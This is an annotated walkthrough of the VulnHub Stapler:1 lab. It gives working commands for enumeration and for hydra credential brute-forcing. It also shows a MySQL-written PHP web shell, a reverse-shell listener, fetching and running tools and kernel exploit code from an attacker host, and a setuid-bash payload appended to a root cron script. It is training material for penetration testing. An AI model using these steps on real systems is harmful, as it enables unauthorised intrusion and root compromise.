VulnHub: STAPLER: 1

  1. Network discovery
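# Host discovery on the lab segment (ping sweep only, no port scan).
nmap -sn 10.0.2.32/24

# Port scan in two passes.  A plain scan covers nmap's top-1000 ports only;
# the second pass covers every TCP port.  (The notes originally used -p1000-,
# which together with the top-1000 scan still leaves low-numbered ports that
# are not in nmap's top-1000 list unscanned; -p- closes that gap.)
# -Pn: skip host discovery, the host is already known to be up.
nmap -Pn 10.0.2.31
nmap -Pn -p- 10.0.2.31

# Version detection, OS guess and default NSE scripts on the open ports found
# above.  -A is noisy; fine in a lab, not for a stealthy engagement.
nmap -A -p20,21,22,53,80,139,666,3306,12380 10.0.2.31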
  • port 21 vsftpd w/ anonymous login
  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
  • port 53 dnsmasq 2.75
  • port 80 PHP cli server 5.5 or later
  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
  • port 666 unknown service (nmap's service-name table labels 666 as "doom"; it is identified by hand below)
  • port 3306 MySQL 5.7.12-0ubuntu1
  • port 12380 Apache httpd 2.4.18 ((Ubuntu))
# NSE "vuln" category against the discovered ports.  Several scripts in that
# category are intrusive (they send exploit-style probes), so this is lab-only.
nmap -p 20,21,22,53,80,139,666,3306,12380 --script=vuln 10.0.2.31
  • port 21 vsftpd 3.0.3 w/ anonymous login
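# Anonymous FTP (vsftpd allows it, see the nmap output above).
# Username "anonymous"; any string is accepted as the password.
# The notes run this interactively; the commands below the ftp line are typed
# at the ftp> prompt.  Non-interactive alternative for scripting:
#   curl -s --user anonymous:anon ftp://10.0.2.31/        (listing)
#   curl -s --user anonymous:anon -O ftp://10.0.2.31/note (download)
ftp 10.0.2.31
#   ls -la
#   get note
#   quit

# Back in the local shell: read the file that was pulled down.
cat note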
  • port 22 OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
# Quick manual connect: confirms sshd accepts interactive logins and shows
# any pre-auth banner the server is configured to print.  No credentials yet,
# so Ctrl-C at the password prompt; the real login happens after hydra below.
ssh 10.0.2.31
  • port 53 dnsmasq 2.75
# Reverse (PTR) lookup of the target, asked of the target's own dnsmasq.
# Reveals the hostname the box gives itself, if a PTR record is configured.
dig @10.0.2.31 -x 10.0.2.31
  • port 80 PHP cli server 5.5 or later
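# Port 80 is a PHP CLI development server (nmap fingerprint above), not Apache.
nikto -h http://10.0.2.31

# Dotfiles served from the document root.  `php -S` serves its working
# directory by default, so .bashrc/.profile being reachable suggests the
# server was started from a user's home directory — confirm from the
# file contents.
wget http://10.0.2.31/.bashrc
wget http://10.0.2.31/.profile
cat .bashrc
cat .profile

# Directory/file brute force.  The wordlist path is the Kali/dirbuster default;
# adjust for other distros.  -q suppresses the banner and progress output.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt \
  -u http://10.0.2.31/ -x php,txt,html,sh,cgi -q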
  • port 139 netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
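# SMB share/user enumeration via NSE, then the broader enum4linux sweep.
# The output is long, so keep it in a file; the account names it lists are
# the likely source of the users.txt used for brute-forcing later.
nmap -p 139 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.31
enum4linux -a 10.0.2.31 > enum4linux.txt

# Pull the interesting files from the "kathy" share.  -N = null session, i.e.
# no password prompt (the notes pressed Enter at the prompt).  The lines after
# smbclient are typed at the smb: \> prompt.
smbclient -N //10.0.2.31/kathy
#   dir
#   cd kathy_stuff
#   dir
#   get todo-list.txt    # the notes spell this both "to_do-list.txt" and
#                        # "todo-list.txt"; use the name the dir listing shows
#   cd ../backup
#   get vsftpd.conf
#   get wordpress-4.tar.gz
#   quit

cat todo-list.txt
cat vsftpd.conf

# Unpack the WordPress backup and look for config files anywhere in the tree.
# The notes end up reading only wp-config-sample.php, which holds placeholder
# values — that suggests the real wp-config.php (DB credentials) was not in
# the backup; confirm from the find output.
tar -xzvf wordpress-4.tar.gz
cd wordpress
find . -path '*config*' -name '*.php'
cat ./wp-config-sample.php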
  • port 666 unknown service (labelled "doom" by nmap's service-name table)
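# Port 666: just an unknown TCP listener.  Connect interactively first to see
# whether it pushes data or waits for input.
nc -nv 10.0.2.31 666

# The server pushes a blob; capture it to a file.  Identify it with file(1)
# before trusting the name: the notes save it as message.jpg but then unzip
# it, so the payload is a zip archive (presumably wrapping an image, going by
# the name) rather than a JPEG.
nc -nv 10.0.2.31 666 > message.jpg
ls -la
file message.jpg
exiftool message.jpg
unzip message.jpg

# The notes then look at the "tmp" share (null session).  Why is not recorded;
# presumably something in the extracted archive points there — confirm.
smbclient -N //10.0.2.31/tmp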
  • port 3306 MySQL 5.7.12-0ubuntu1
  • port 12380 Apache httpd 2.4.18 ((Ubuntu))
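# Port 12380 is a second web server (Apache).  Scan it over both plain HTTP
# and TLS — the two can be served by different virtual hosts.
nikto -h http://10.0.2.31:12380
nikto -h https://10.0.2.31:12380

# -k: accept the self-signed certificate.  Lab only; never bake certificate
# checks off into production tooling.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt \
  -u https://10.0.2.31:12380/ -x php,txt,html,sh,cgi -q -k

# WordPress under /blogblog/.  The notes used three separate flags
# (-et -ep -eu); the comma-separated --enumerate list works in both WPScan 2.x
# and 3.x: t = themes, p = plugins, u = users.  --disable-tls-checks for the
# self-signed cert, as above.
wpscan --url https://10.0.2.31:12380/blogblog/ --enumerate t,p,u --disable-tls-checks

# Second pass: aggressive plugin detection requests every known plugin path —
# slow and very noisy, but it finds plugins that passive detection misses.
wpscan --url https://10.0.2.31:12380/blogblog/ --disable-tls-checks --plugins-detection aggressive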
  1. FTP Port 21 — brute-forcing
  2. SSH Port 22 — brute-forcing
  3. HTTP(S) Port 12380 — brute-forcing and public exploit
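# users.txt: the account names harvested above (enum4linux / WordPress user
# enumeration) — check its contents before running.  Using the same file for
# -L and -P tries every user against every name as a password (n^2 attempts);
# it is the "username as password" hypothesis, which `-e s` tests directly
# and far faster if that is all you want.
hydra -L users.txt -P users.txt ftp://10.0.2.31

# Log in with the pair hydra reported (SHayslett:SHayslett) and look around.
# The lines after ftp are typed at the ftp> prompt.
ftp 10.0.2.31
#   user: SHayslett   password: SHayslett
#   ls -la
#   quit

# Same hypothesis against SSH.  -t 4 keeps parallel connections low (sshd's
# MaxStartups drops connections above its limit, which shows up as false
# negatives); -u loops over users before passwords; -F stops at the first
# valid pair; -V prints every attempt.
hydra -L users.txt -P users.txt 10.0.2.31 ssh -t 4 -u -F -V
ssh SHayslett@10.0.2.31

# WordPress password attack against the users wpscan enumerated.  On a real
# site expect lockout / rate-limiting plugins; none are reported in these notes.
wpscan --url https://10.0.2.31:12380/blogblog/ --disable-tls-checks -P ~/Desktop/rockyou.txt

# Public exploit for a plugin found by the aggressive scan.  39646 looks like
# an Exploit-DB ID (cf. `searchsploit -m 39772` below); the script itself is
# not shown, so read it before running — check what it requests, what it
# fetches, and where it writes.
python 39646.py

# Remote MySQL login as root.  The password is presumably what the exploit
# above exposed (wp-config.php is the usual place) — confirm.  Passing
# -p<password> on the command line leaks it into shell history and `ps`;
# prefer a bare -p so the client prompts, or a ~/.my.cnf with mode 0600.
mysql -h 10.0.2.31 -uroot -pplbkac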
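# Web-shell drop via MySQL.  Target path — the WordPress uploads directory,
# which the web server serves and mysqld can write to:
#   /var/www/https/blogblog/wp-content/uploads/
# Typed at the mysql> prompt of the session opened above.  Requirements:
# the FILE privilege, secure_file_priv not restricting the destination, and
# the directory writable by the mysqld user (the file is written as mysqld,
# not as the web server).
# SECURITY: this is an *unauthenticated* command-execution backdoor — anyone
# who can reach the URL can pass ?cmd=.  Remove shell.php during cleanup.
#   USE mysql;
#   SELECT "<?php echo shell_exec($_GET['cmd']);?>"
#     INTO OUTFILE "/var/www/https/blogblog/wp-content/uploads/shell.php";

# Listener for the reverse shell.  The request that makes shell.php call back
# (a ?cmd= reverse-shell one-liner) is not recorded in the notes.  rlwrap
# gives line editing and history on the raw socket.
rlwrap nc -lvp 443

# On the target, once the shell lands: upgrade to a pseudo-terminal so su,
# sudo and editors work.  (The notes had curly quotes here, which are a
# syntax error when pasted — straight quotes are required.)
python -c 'import pty;pty.spawn("/bin/bash");'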
  1. Explore the directories listed below on the target (as the low-privileged web-shell user):
/opt, /tmp, /var/log, /var/www/https/, /var/mail
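# On the attacker box: serve the current directory over HTTP so the target
# can fetch tools.  This is Python 2 (Python 3: `python3 -m http.server 80`).
# It serves *everything* in the cwd to anyone who can reach the port — run it
# from a directory that holds only the files you intend to transfer.
python -m SimpleHTTPServer 80

# On the target: fetch and run LinEnum from /tmp.  The notes used chmod 777;
# the script only needs the execute bit, and a world-writable file on a
# shared host lets any other local user rewrite what you are about to run.
cd /tmp
wget http://10.0.2.32/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh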
  • Login as peter and verify sudo
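# Switch to peter with the password recovered earlier (where it came from is
# not recorded in these notes — confirm against the enumeration output).
su peter
#   Password: JZQuyIN5

# Always check what sudo grants before using it.  The notes go straight to a
# root shell afterwards, which implies peter's rule covers su (or ALL); the
# `sudo -l` output is what actually proves that.
sudo -l
sudo su
whoami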
  • cronjob
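# Privilege escalation via a root cron job that runs a writable script.
cat /etc/cron.d/logrotate                  # which script runs, as whom, how often
ls -la /usr/local/sbin/cron-logrotate.sh   # confirm the script is writable by us
cat /usr/local/sbin/cron-logrotate.sh

# Append a payload: when cron next runs the script as root it leaves a copy of
# bash in /tmp with the setuid and setgid bits set (chmod +xs sets both).
# CLEANUP: this permanently modifies a system script on the target — remove
# the appended line and /tmp/rootbash when done.
echo "cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash" >> /usr/local/sbin/cron-logrotate.sh
cat /usr/local/sbin/cron-logrotate.sh

# Wait for the next cron run (interval from the cron.d entry above), then
# confirm /tmp/rootbash exists and shows the s bits before calling it.
ls -la /tmp/rootbash

# -p is essential: without it bash resets the effective uid to the real uid
# at startup and you keep the unprivileged shell.
/tmp/rootbash -p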
  • kernel exploitation
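# Kernel route (alternative to the cron job).  Kernel exploits can panic the
# target and destroy evidence — try them last, and only with a snapshot to
# roll back to.
uname -a
searchsploit linux kernel 4.4

# -m copies the Exploit-DB entry into the current directory.  39772 is a text
# advisory; exploit.tar is presumably the archive it links to (how it was
# fetched is not recorded in the notes).
searchsploit -m 39772
cat 39772.txt
tar -xvf exploit.tar

# On the target: fetch the pieces from the attacker's web server (started with
# SimpleHTTPServer earlier) and build.  The notes had "http:/" with a single
# slash on every URL and no chmod — wget saves files without the execute bit,
# so ./compile.sh would fail with "Permission denied".
wget http://10.0.2.32/hello.c
wget http://10.0.2.32/suidhelper.c
wget http://10.0.2.32/doubleput.c
wget http://10.0.2.32/compile.sh
chmod +x compile.sh
./compile.sh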
